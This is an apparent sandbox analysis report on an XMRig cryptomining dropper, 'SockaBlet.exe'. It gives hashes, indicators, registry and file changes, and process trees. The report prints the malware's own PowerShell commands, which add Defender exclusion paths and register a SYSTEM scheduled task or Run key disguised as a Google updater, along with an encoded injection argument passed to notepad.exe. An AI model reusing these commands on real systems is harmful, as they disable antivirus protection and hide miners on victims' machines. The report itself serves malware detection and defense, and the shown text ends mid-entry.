xmrig | 4e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2023 09:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SockaBlet.exe
Size

2.0MB
MD5

9c84a7a992b37ae6ad3f39b8435f953c
SHA1

81c0475316d118665983b78eb7b85599fae61138
SHA256

4e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354
SHA512

d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d
SSDEEP

49152:EMTGvc8bU8qOJFBfqK/tuZmsXz08r+gNZTruavlOpb:EMacQVtFPOmuA8HNZTKCOp

Score

10^/10

xmrig miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

Processes:

SockaBlet.exeupdater.execonhost.exe

description	pid	process	target process
PID 4480 created 3232	4480	SockaBlet.exe	Explorer.EXE
PID 4480 created 3232	4480	SockaBlet.exe	Explorer.EXE
PID 4480 created 3232	4480	SockaBlet.exe	Explorer.EXE
PID 1068 created 3232	1068	updater.exe	Explorer.EXE
PID 1068 created 3232	1068	updater.exe	Explorer.EXE
PID 1068 created 3232	1068	updater.exe	Explorer.EXE
PID 1068 created 3232	1068	updater.exe	Explorer.EXE
PID 4376 created 3232	4376	conhost.exe	Explorer.EXE
PID 1068 created 3232	1068	updater.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4088-252-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-254-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-255-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-257-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-259-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-261-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-263-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-265-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-267-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-269-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-275-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig
behavioral2/memory/4088-277-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

SockaBlet.exeupdater.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SockaBlet.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1068 updater.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SockaBlet.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

pid	process
1068	updater.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4088-252-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-254-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-255-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-257-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-259-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-261-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-263-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-265-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-267-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-269-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-275-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx
behavioral2/memory/4088-277-0x00007FF626ED0000-0x00007FF6276C4000-memory.dmp	upx

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1068 set thread context of 4376	1068	updater.exe	conhost.exe
PID 1068 set thread context of 4088	1068	updater.exe	notepad.exe

Drops file in Program Files directory 4 IoCs

Processes:

SockaBlet.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	SockaBlet.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

SockaBlet.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exenotepad.exe

pid	process
4480	SockaBlet.exe
4480	SockaBlet.exe
3700	powershell.exe
3700	powershell.exe
4480	SockaBlet.exe
4480	SockaBlet.exe
1096	powershell.exe
1096	powershell.exe
4480	SockaBlet.exe
4480	SockaBlet.exe
1244	powershell.exe
1244	powershell.exe
1068	updater.exe
1068	updater.exe
1816	powershell.exe
1816	powershell.exe
1068	updater.exe
1068	updater.exe
4664	powershell.exe
4664	powershell.exe
1068	updater.exe
1068	updater.exe
1068	updater.exe
1068	updater.exe
4376	conhost.exe
4376	conhost.exe
1068	updater.exe
1068	updater.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe
4088	notepad.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeIncreaseQuotaPrivilege	1096	powershell.exe
Token: SeSecurityPrivilege	1096	powershell.exe
Token: SeTakeOwnershipPrivilege	1096	powershell.exe
Token: SeLoadDriverPrivilege	1096	powershell.exe
Token: SeSystemProfilePrivilege	1096	powershell.exe
Token: SeSystemtimePrivilege	1096	powershell.exe
Token: SeProfSingleProcessPrivilege	1096	powershell.exe
Token: SeIncBasePriorityPrivilege	1096	powershell.exe
Token: SeCreatePagefilePrivilege	1096	powershell.exe
Token: SeBackupPrivilege	1096	powershell.exe
Token: SeRestorePrivilege	1096	powershell.exe
Token: SeShutdownPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeSystemEnvironmentPrivilege	1096	powershell.exe
Token: SeRemoteShutdownPrivilege	1096	powershell.exe
Token: SeUndockPrivilege	1096	powershell.exe
Token: SeManageVolumePrivilege	1096	powershell.exe
Token: 33	1096	powershell.exe
Token: 34	1096	powershell.exe
Token: 35	1096	powershell.exe
Token: 36	1096	powershell.exe
Token: SeIncreaseQuotaPrivilege	1096	powershell.exe
Token: SeSecurityPrivilege	1096	powershell.exe
Token: SeTakeOwnershipPrivilege	1096	powershell.exe
Token: SeLoadDriverPrivilege	1096	powershell.exe
Token: SeSystemProfilePrivilege	1096	powershell.exe
Token: SeSystemtimePrivilege	1096	powershell.exe
Token: SeProfSingleProcessPrivilege	1096	powershell.exe
Token: SeIncBasePriorityPrivilege	1096	powershell.exe
Token: SeCreatePagefilePrivilege	1096	powershell.exe
Token: SeBackupPrivilege	1096	powershell.exe
Token: SeRestorePrivilege	1096	powershell.exe
Token: SeShutdownPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeSystemEnvironmentPrivilege	1096	powershell.exe
Token: SeRemoteShutdownPrivilege	1096	powershell.exe
Token: SeUndockPrivilege	1096	powershell.exe
Token: SeManageVolumePrivilege	1096	powershell.exe
Token: 33	1096	powershell.exe
Token: 34	1096	powershell.exe
Token: 35	1096	powershell.exe
Token: 36	1096	powershell.exe
Token: SeIncreaseQuotaPrivilege	1096	powershell.exe
Token: SeSecurityPrivilege	1096	powershell.exe
Token: SeTakeOwnershipPrivilege	1096	powershell.exe
Token: SeLoadDriverPrivilege	1096	powershell.exe
Token: SeSystemProfilePrivilege	1096	powershell.exe
Token: SeSystemtimePrivilege	1096	powershell.exe
Token: SeProfSingleProcessPrivilege	1096	powershell.exe
Token: SeIncBasePriorityPrivilege	1096	powershell.exe
Token: SeCreatePagefilePrivilege	1096	powershell.exe
Token: SeBackupPrivilege	1096	powershell.exe
Token: SeRestorePrivilege	1096	powershell.exe
Token: SeShutdownPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeSystemEnvironmentPrivilege	1096	powershell.exe
Token: SeRemoteShutdownPrivilege	1096	powershell.exe
Token: SeUndockPrivilege	1096	powershell.exe
Token: SeManageVolumePrivilege	1096	powershell.exe
Token: 33	1096	powershell.exe
Token: 34	1096	powershell.exe
Token: 35	1096	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powershell.exeupdater.execmd.exe

description	pid	process	target process
PID 1244 wrote to memory of 2084	1244	powershell.exe	schtasks.exe
PID 1244 wrote to memory of 2084	1244	powershell.exe	schtasks.exe
PID 1068 wrote to memory of 4376	1068	updater.exe	conhost.exe
PID 3228 wrote to memory of 388	3228	cmd.exe	WMIC.exe
PID 3228 wrote to memory of 388	3228	cmd.exe	WMIC.exe
PID 1068 wrote to memory of 4088	1068	updater.exe	notepad.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3232

C:\Users\Admin\AppData\Local\Temp\SockaBlet.exe
"C:\Users\Admin\AppData\Local\Temp\SockaBlet.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lcyitm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mwzfmvpg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1244

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lcyitm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4664

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe jyfvlzyvjtyyzdb
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4376

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:388

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:2996

C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe kxbznjupmywwxqtm 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaK7PN8mix6MMV4iGHNORhFa56SHcZDeCW1Lsov71dhdQbkXuUv9ftk11ZvDqqAQvZCLFfwdNs/aL+K3Pw4W2/Zq7N1D+h2sxg3TiHZeO1pQ+VhAEqfsJzMxttgvg82q1nelXnau3b1wD0AB1GS81hqYkfF9Ffcz3HVCMMF8vA0Z/t9gPEtSvxVdVLEuEiYFjFc0MfHMAYC1iYIy/jkt+fzZnPwDHv6S9aNk+sLVoNsUdmbLDx07OdFlugfJNkLV2xNXdFezuST7/GnUEiVYjRXC2eButxvL/AnR9+l57TO/Hh2uNijfqioGCXa9sh1+qRF/+r+TmcgTfhKT2Am1vIg5MUXERpg3zH2ngJNzTTFrpoZ2f8kV/NMxL5HU4QM39jdbtLnLDFYVepzxgT91Nu3yrbnx7Me33tw3nDJgk2evr7II5XeX3MrzFO7VnNAw9Zc8djcpYNzdNgG3DOLiEhiX75KMZHCnwhoeposcvhYluU=
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1068

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.0MB

MD5
9c84a7a992b37ae6ad3f39b8435f953c

SHA1
81c0475316d118665983b78eb7b85599fae61138

SHA256
4e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354

SHA512
d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.0MB

MD5
9c84a7a992b37ae6ad3f39b8435f953c

SHA1
81c0475316d118665983b78eb7b85599fae61138

SHA256
4e5fbc23bbecadfc537e5f3b83d12331052289364be3b2116a1dbd0296097354

SHA512
d9ed4faf75450a500945a8f7de03e6086cffb2f780fc7e4bb83e40301718c8aebdd74b07fb41a1dac9165f15e7b4e02aef68312e52b9dd8f238457f4f899578d

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
c6c940df49fc678d1c74fea3c57a32f9

SHA1
79edd715358a82e6d29970998ff2e9b235ea4217

SHA256
4e50925adb70141467a7081cc905c76fd6dab841195400683f9f67fc2602aa0a

SHA512
3c1df9c18f1756ead841f68916dec03a066078b0705443d3f886fd990e2e42ebbffd46916be3f6fe39ea0505fc2c848fbdea56828fbd5aa5f24b329f8d979707

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3e5933f7f6d9e335061999e8c0d0e676

SHA1
5c6ac690eabf166fa0c6b7699b029fc7c6a5b7fa

SHA256
76717e2ce46bc0a9d78e9726a310e6e1d002e294db19f81a5576b0c6fce76ade

SHA512
da1ce3194eb216e00a8115bd39f6e2a98ee7f7a7101381a54f56fba7fc23f0aa1dc81ccbd1a2331d63fdda84cc6c4d382ccc9ba9980a21c4c6af751fa8e16447

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcv2xguh.edr.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
1KB

MD5
a4dccac2693d924c8f30454964adee24

SHA1
ef4d233883ddc5046465a92afdbf5640bd195b07

SHA256
db11d91f75428f51d075981a8786071515d088cf703eeac53e667e91d85cb0b5

SHA512
639f8ec91f4ec3619e4e5707530da586f8b370d5c84d0a297123330ba1cf0350d7425e27b5fe7abd8d38c9b600306dda7c22056f39cdf7943b6a816efc961091

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
